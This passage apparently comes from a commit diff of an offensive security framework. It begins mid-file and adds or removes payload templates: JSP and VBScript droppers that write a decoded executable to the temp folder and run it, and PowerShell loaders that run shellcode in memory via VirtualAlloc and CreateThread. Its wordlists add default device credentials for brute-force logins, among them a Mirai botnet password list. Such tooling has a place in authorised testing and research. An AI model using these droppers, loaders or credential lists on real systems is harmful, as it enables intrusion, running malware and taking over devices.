<gadget offset="0x00020453">pushad, ret</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
-->
</db>

38
data/templates/scripts/to_exe.jsp.template Normal file
View File

@ -0,0 +1,38 @@
<%%@ page import="java.io.*" %%>
<%%
String %{var_payload} = "%{payload}";
String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {
%{var_exepath} = %{var_exepath}.concat(".exe");
}
int %{var_payloadlength} = %{var_payload}.length();
byte[] %{var_bytes} = new byte[%{var_payloadlength}/2];
for (int %{var_counter} = 0; %{var_counter} < %{var_payloadlength}; %{var_counter} += 2) {
%{var_bytes}[%{var_counter} / 2] = (byte) ((Character.digit(%{var_payload}.charAt(%{var_counter}), 16) << 4)
+ Character.digit(%{var_payload}.charAt(%{var_counter}+1), 16));
}
FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
%{var_outputstream}.write(%{var_bytes});
%{var_outputstream}.flush();
%{var_outputstream}.close();
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
String[] %{var_fperm} = new String[3];
%{var_fperm}[0] = "chmod";
%{var_fperm}[1] = "+x";
%{var_fperm}[2] = %{var_exepath};
Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
if (%{var_proc}.waitFor() == 0) {
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
}
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
} else {
String[] %{var_exepatharray} = new String[1];
%{var_exepatharray}[0] = %{var_exepath};
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
}
%%>

26
data/templates/scripts/to_exe.vbs.template
View File

@ -1,23 +1,31 @@
Function %{var_func}()
%{var_shellcode} = "%{hex_shellcode}"
Function %{var_decodefunc}(%{var_decodebase64})
%{var_xml} = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
%{var_decodebase64} & "</B64DECODE>"
Set %{var_xmldoc} = CreateObject("MSXML2.DOMDocument.3.0")
%{var_xmldoc}.LoadXML(%{var_xml})
%{var_decodefunc} = %{var_xmldoc}.selectsinglenode("B64DECODE").nodeTypedValue
set %{var_xmldoc} = nothing
End Function
Function %{var_func}()
%{var_shellcode} = "%{base64_shellcode}"
Dim %{var_obj}
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
Dim %{var_stream}
Dim %{var_tempdir}
Dim %{var_tempexe}
Dim %{var_basedir}
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
%{var_obj}.CreateFolder(%{var_basedir})
%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
For i = 1 to Len(%{var_shellcode}) Step 2
%{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
Next
%{var_stream}.Close
Dim %{var_shell}
Set %{var_shell} = CreateObject("Wscript.Shell")
%{var_decoded} = %{var_decodefunc}(%{var_shellcode})
Set %{var_adodbstream} = CreateObject("ADODB.Stream")
%{var_adodbstream}.Type = 1
%{var_adodbstream}.Open
%{var_adodbstream}.Write %{var_decoded}
%{var_adodbstream}.SaveToFile %{var_tempexe}, 2
%{var_shell}.run %{var_tempexe}, 0, true
%{var_obj}.DeleteFile(%{var_tempexe})
%{var_obj}.DeleteFolder(%{var_basedir})

51
data/templates/scripts/to_exe_jsp.war.template
View File

@ -1,51 +0,0 @@
<%%@ page import="java.io.*" %%>
<%%
String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
String %{var_data} = "";
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
{
%{var_exepath} = %{var_exepath}.concat(".exe");
}
FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
int %{var_numbytes} = %{var_inputstream}.available();
byte %{var_bytearray}[] = new byte[%{var_numbytes}];
%{var_inputstream}.read(%{var_bytearray});
%{var_inputstream}.close();
byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
{
char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
%{var_comb} <<= 4;
%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
}
%{var_outputstream}.write(%{var_bytes});
%{var_outputstream}.close();
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
String[] %{var_fperm} = new String[3];
%{var_fperm}[0] = "chmod";
%{var_fperm}[1] = "+x";
%{var_fperm}[2] = %{var_exepath};
Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
if (%{var_proc}.waitFor() == 0) {
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
}
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
}
else
{
String[] %{var_exepatharray} = new String[1];
%{var_exepatharray}[0] = %{var_exepath};
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
}
%%>

30
data/templates/scripts/to_mem_dotnet.ps1.template
View File

@ -1,30 +0,0 @@
Set-StrictMode -Version 2
$%{var_syscode} = @"
using System;
using System.Runtime.InteropServices;
namespace %{var_kernel32} {
public class func {
[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
}
}
"@
$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
$%{var_compileParams}.GenerateInMemory = $True
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)

20
data/templates/scripts/to_mem_old.ps1.template
View File

@ -1,20 +0,0 @@
$%{var_syscode} = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
"@
$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
%{shellcode}
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
}
$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)

27
data/templates/scripts/to_mem_pshreflection.ps1.template
View File

@ -1,27 +0,0 @@
function %{func_get_proc_address} {
Param ($%{var_module}, $%{var_procedure})
$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
}
function %{func_get_delegate_type} {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
)
$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
return $%{var_type_builder}.CreateType()
}
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null

7
data/templates/src/elf/dll/elf_dll_x64_template.s
View File

@ -50,7 +50,7 @@ shdr:
dd 0 ; sh_link
dd 0 ; sh_info
dq 8 ; sh_addralign
dq dynsz ; sh_entsize
dq 7 ; sh_entsize
shentsize equ $ - shdr
dd 0 ; sh_name
dd 3 ; sh_type = SHT_STRTAB
@ -66,9 +66,6 @@ dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_HASH
dq 0x04
dq 0
; DT_STRTAB
dq 0x05
dq strtab
@ -77,7 +74,7 @@ dynsection:
dq strtab
; DT_STRSZ
dq 0x0a
dq strtabsz
dq 0
; DT_SYMENT
dq 0x0b
dq 0

BIN
data/templates/template_x64_linux_dll.bin
View File

Binary file not shown.

1
data/wordlists/common_roots.txt
View File

@ -4722,3 +4722,4 @@ zxcvbn
zxcvbnm
zzzz
zzzzzz
vagrant

30
data/wordlists/default_pass_for_services_unhash.txt
View File

@ -1212,3 +1212,33 @@ SQL
CMOSPWD
dadmin
wlcsystem
vagrant
xc3511
vizxv
888888
xmhdipc
juantech
54321
666666
klv123
service
666666
888888
ubnt
klv1234
Zte521
hi3518
jvbzd
anko
zlxx.
7ujMko0vizxv
7ujMko0admin
ikwb
dreambox
user
realtek
1111111
54321
7ujMko0admin
meinsm
fucker

33
data/wordlists/default_userpass_for_services_unhash.txt
View File

@ -1785,3 +1785,36 @@ AURORA$JIS$UTILITY$
wlcsystem wlcsystem
news
CPRM
root xc3511
root vizxv
root 888888
root xmhdipc
root juantech
root 123456
root 54321
root 1111
root 666666
root klv123
service service
admin1 password
666666 666666
888888 888888
ubnt ubnt
root klv1234
root Zte521
root hi3518
root jvbzd
root anko
root zlxx.
root 7ujMko0vizxv
root 7ujMko0admin
root ikwb
root dreambox
root user
root realtek
root 00000000
admin 1111111
admin 54321
admin 7ujMko0admin
admin meinsm
mother fucker

5
data/wordlists/default_users_for_services_unhash.txt
View File

@ -913,3 +913,8 @@ AUTOLOG1
AURORA$JIS$UTILITY$
wlcsystem
CPRM
Admin1
ubnt
666666
888888
mother

1
data/wordlists/http_default_pass.txt
View File

@ -16,3 +16,4 @@ xampp
wampp
ppmax2011
turnkey
vagrant

1
data/wordlists/http_default_userpass.txt
View File

@ -8,3 +8,4 @@ wampp xampp
newuser wampp
xampp-dav-unsecure ppmax2011
admin turnkey
vagrant vagrant

1
data/wordlists/http_default_users.txt
View File

@ -11,3 +11,4 @@ sys
wampp
newuser
xampp-dav-unsecure
vagrant

43
data/wordlists/mirai_pass.txt Normal file
View File

@ -0,0 +1,43 @@
00000000
1111
1111111
1234
12345
123456
54321
666666
7ujMko0admin
7ujMko0vizxv
888888
admin
admin1234
anko
default
dreambox
fucker
guest
hi3518
ikwb
juantech
jvbzd
klv123
klv1234
meinsm
pass
password
realtek
root
service
smcadmin
supervisor
support
system
tech
ubnt
user
vizxv
xc3511
xmhdipc
zlxx.
Zte521

15
data/wordlists/mirai_user.txt Normal file
View File

@ -0,0 +1,15 @@
666666
888888
admin
admin1
administrator
Administrator
guest
mother
root
service
supervisor
support
tech
ubnt
user

Some files were not shown because too many files have changed in this diff Show More